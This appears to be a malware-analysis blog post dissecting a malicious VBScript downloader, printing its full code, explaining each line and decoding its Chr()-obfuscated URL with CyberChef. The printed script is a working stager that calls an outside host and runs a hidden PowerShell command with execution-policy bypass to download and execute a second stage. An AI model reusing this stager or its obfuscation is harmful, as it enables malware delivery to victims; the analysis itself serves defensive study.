Analysis Malicious VBS Script

 

Like PowerShell Script, VBA Script is a scripting language that is sometimes used by attackers to download the second or final stage of malware. Because in fact, VBA scripts have the ability to interact with the system and shell. What malware analysts are aware of is that VBA scripts are mostly used in Office documents or malicious macros. In this post we will discuss how to analyze VBA scripts by explaining the code and also decrypt the code encoded or encrypted by the developers of malware to bypass the programs that are used to scan devices for any malware.

SHA256 : 20dcca71c02969d6c0c964e35fbacd22af83bd73f6da14657d1bbc9b7154e147
Sample : https://bazaar.abuse.ch/sample/20dcca71c02969d6c0c964e35fbacd22af83bd73f6da14657d1bbc9b7154e147

Malicious VBAScript Code :

Dim wsh, http, url, method, async

url = Chr(104) & "t" & Chr(116) & Chr(112) & "s" & ":" & "/" & "/" & Chr(121) & Chr(101) & Chr(116) & Chr(116) & "i" & Chr(103) & Chr(114) & "e" & "t" & Chr(114) & Chr(97) & "d" & Chr(105) & "n" & Chr(103) & "." & "c" & Chr(111) & "m" & "/" & "." & Chr(118) & "b" & Chr(115) & "/" & "1" & "7" & Chr(53) & Chr(57) & "/" & Chr(49) & "7" & "5" & "9" & "." & Chr(112) & Chr(115) & Chr(49)

Set wsh = CreateObject("WScript.Shell")

Set http = CreateObject("WinHttp.WinHttpRequest.5.1")

method = "GET"

async = False

http.Open method, url, async

http.Send

wsh.Run "powershell -nop -exec bypass -c """"$url='" & url & "';$req=New-Object -ComObject WinHttp.WinHttpRequest.5.1;$req.Open('GET',$url,$false);$req.Send();iex $req.ResponseText""""", 0, async

' Cleanup

Set wsh = Nothing

Set http = Nothing

Code Screenshot :

Code Explanation :  

1. Malware Developer declares some variables : wsh, http, url, method, async
2. Malware Developer used char to encode and encrypt the url that responsible to download a second stage of the malicious file .
3. Malware Developer create an object to interact with the shell script: Set wsh = CreateObject("WScript.Shell")
4.  Malware Developer create an object to set the Windows HTPP Request : Set http = CreateObject("WinHttp.WinHttpRequest.5.1")
5. Malware Developer used GET method to download and retrieve the file from the host that a second stage is hosted on it .
6. Malware Developer used Powershell code to : Bypass Execution Policies , Execute . 

Decoding the Encoded Char  :

1. Charcode : Chr(104) & "t" & Chr(116) & Chr(112) & "s" & ":" & "/" & "/" & Chr(121) & Chr(101) & Chr(116) & Chr(116) & "i" & Chr(103) & Chr(114) & "e" & "t" & Chr(114) & Chr(97) & "d" & Chr(105) & "n" & Chr(103) & "." & "c" & Chr(111) & "m" & "/" & "." & Chr(118) & "b" & Chr(115) & "/" & "1" & "7" & Chr(53) & Chr(57) & "/" & Chr(49) & "7" & "5" & "9" & "." & Chr(112) & Chr(115) & Chr(49)
2. Open CyebrChef.org 
3. Paste in the first right side . 

1. In Left side ( Operations ) type Find/Replace 

2. Find: Chr\((\d+)\)

3. Replace: \x$1

4. From Hex ( Operations ) 

Result : https[://]yettigretarding[.]com/[.vbs]/1759/1759[.ps1]